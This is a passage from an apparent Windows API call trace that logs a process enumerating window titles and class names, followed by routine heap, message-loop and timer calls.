Explorer_Hidden") returned 24 [0204.500] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0204.500] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0204.500] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.500] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.501] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0204.501] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0204.501] GetWindowTextW (in: hWnd=0x10082, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.501] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.501] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.501] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.503] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.503] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.503] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.503] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.503] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.503] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.503] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.503] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.503] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.503] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.504] GetWindowTextW (in: hWnd=0x20224, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.504] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.504] GetWindowTextW (in: hWnd=0x10398, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.504] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.504] GetWindowTextW (in: hWnd=0x10394, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.504] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.504] GetWindowTextW (in: hWnd=0x10392, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.505] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.505] GetWindowTextW (in: hWnd=0x10390, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.505] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.505] GetWindowTextW (in: hWnd=0x10388, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.505] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.505] GetWindowTextW (in: hWnd=0x10386, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.505] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.505] GetWindowTextW (in: hWnd=0x10384, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.505] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.506] GetWindowTextW (in: hWnd=0x10382, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.506] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.506] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.506] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.506] GetWindowTextW (in: hWnd=0x10380, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.506] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.506] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.506] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.506] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.507] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.507] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.507] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.507] GetWindowTextW (in: hWnd=0x10378, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.507] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.507] GetWindowTextW (in: hWnd=0x10376, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.507] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.507] GetWindowTextW (in: hWnd=0x10374, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.508] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.508] GetWindowTextW (in: hWnd=0x10372, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.508] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.508] GetWindowTextW (in: hWnd=0x10370, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.508] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.508] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.508] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.508] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.508] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.508] GetWindowTextW (in: hWnd=0x10368, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.509] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.509] GetWindowTextW (in: hWnd=0x10362, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.509] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.509] GetWindowTextW (in: hWnd=0x10360, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.510] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.510] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.510] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.510] GetWindowTextW (in: hWnd=0x10358, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.511] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.511] GetWindowTextW (in: hWnd=0x10356, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.511] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.512] GetWindowTextW (in: hWnd=0x10354, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.512] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.512] GetWindowTextW (in: hWnd=0x10352, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.512] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.512] GetWindowTextW (in: hWnd=0x10350, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.512] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.512] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.512] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.512] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.513] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.513] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.513] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.513] GetWindowTextW (in: hWnd=0x10348, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.513] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.513] GetWindowTextW (in: hWnd=0x10346, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.513] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.513] GetWindowTextW (in: hWnd=0x20216, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.514] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.514] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.514] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.514] GetWindowTextW (in: hWnd=0x10334, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.514] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.514] GetWindowTextW (in: hWnd=0x10326, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.514] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.514] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.514] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.515] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.515] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.515] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.515] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.515] GetWindowTextW (in: hWnd=0x10312, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.515] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.515] GetWindowTextW (in: hWnd=0x20208, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.516] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.516] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.516] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.516] GetWindowTextW (in: hWnd=0x10278, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.517] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.517] GetWindowTextW (in: hWnd=0x10276, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.517] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.517] GetWindowTextW (in: hWnd=0x10274, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.517] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.517] GetWindowTextW (in: hWnd=0x20202, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.517] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.517] GetWindowTextW (in: hWnd=0x10272, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.518] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.518] GetWindowTextW (in: hWnd=0x10270, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.518] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.518] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.518] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.518] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.518] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.518] GetWindowTextW (in: hWnd=0x10250, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.519] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.519] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.519] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.519] GetWindowTextW (in: hWnd=0x10248, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.519] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.519] GetWindowTextW (in: hWnd=0x10246, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.520] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.520] GetWindowTextW (in: hWnd=0x10238, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.520] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.520] GetWindowTextW (in: hWnd=0x10228, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.520] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.566] GetWindowTextW (in: hWnd=0x10220, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.566] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.567] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.567] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.567] GetWindowTextW (in: hWnd=0x10212, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.567] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.568] GetWindowTextW (in: hWnd=0x10210, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.569] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.569] GetWindowTextW (in: hWnd=0x40194, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.569] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.569] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.569] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.569] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.569] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.570] GetWindowTextW (in: hWnd=0x10190, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.570] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.570] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0204.570] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0204.570] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.570] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.571] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.571] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.571] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.571] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.571] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.571] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.571] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.572] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.572] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.572] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.572] GetWindowTextW (in: hWnd=0x10076, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0204.572] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6590 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd10 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65d8 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0204.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffca8 | out: hHeap=0x12c0000) returned 1 [0204.573] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0204.573] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0204.573] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0204.573] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0204.573] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0204.574] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0204.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0204.574] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffca8 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b64e8 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0204.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b64e8 | out: hHeap=0x12c0000) returned 1 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302488 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6590 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0204.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6590 | out: hHeap=0x12c0000) returned 1 [0204.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b64e8 [0204.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0204.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0204.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0204.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0204.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0204.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0204.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0204.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0204.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0204.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0204.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0204.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0204.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0204.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0204.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0204.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0204.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0204.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0204.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0204.578] 